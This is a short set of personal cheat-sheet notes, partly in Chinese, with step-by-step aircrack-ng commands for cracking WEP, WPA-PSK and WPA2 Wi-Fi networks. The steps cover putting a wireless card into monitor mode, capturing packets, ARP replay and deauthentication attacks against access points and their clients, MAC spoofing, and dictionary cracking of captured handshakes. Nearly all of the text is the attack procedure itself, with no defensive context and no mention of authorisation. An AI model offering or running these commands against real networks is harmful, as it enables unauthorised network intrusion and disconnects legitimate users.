Aircrack
--------

::

	#aricrack-ng cracking WEP wifi network
	1.load the wireless card
	ifconfig
	ifconfig wlan0 up
	iwconfig
	2.start monitoring mode on wireless card
	airmon-ng start wlan0
	3.catch packages
	airodump-ng mon0
	then
	airodump-ng --ivs –w FILE -c 6 mon0
	airodump-ng –w FILE -c 6 wlan0 
	4.attack target AP with ArpRequest
	aireplay-ng -3 -b AP_mac -h host_mac mon0 
	5.cracking
	aircrack-ng ivs_files|cap_files

	#WPA-PSK
	1.airodump-ng-oui-update 
	2.active card to monitoring mode
	3.catch packages 
	airodump-ng -c 6 –w longas mon0 
	步骤4：进行Deauth攻击加速破解过程。
	aireplay-ng -0 n –a AP的mac -c 客户端的mac wlan0 
	步骤5：开始破解WPA-PSK。
	aircrack-ng -w dic 捕获的cap文件 

	#使用Aircrack-ng破解WPA2-PSK加密无线网络
	as WPA-PSK

Aircrach-ng
-----------
::

	1. WEP
	1.1
		# airmon-ng --> inspect wireless network devices
	1.2
		# airmon-ng stop wlan0  OR # ifconfig wlan0 down --> shut down wlan0
	1.3 
		change MAC
		ifconfig ? ip ?
	1.4 re-start wlan0
		airmon-ng start wlan0
		hint: rfkill - may cause issue.
	1.5 dump avaliable network near.
		airodump-ng wlan0
	1.6 choose target
		airodump-ng –c 1 –w wireless --bssid aa:bb:cc:dd:ee:ff mon0
		new window aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
	1.7 crack
		aircrack-ng -b MAC wireless-01.cap

	2. WPA2
	2.1 
		as above, prepare mon0
	2.2 capture packets
		airodump-ng -c 1 -w abc --bssid 14:E6:E4:AC:FB:20 mon0
	2.3 attack router using Deauth
		aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33:44:55 mon0
	2.4 crack 
		aircrack-ng -w ./dic/wordlist wirelessattack-01.cap

	3. using gerix wifi cracker
		it is a frontend for aircrack-ng
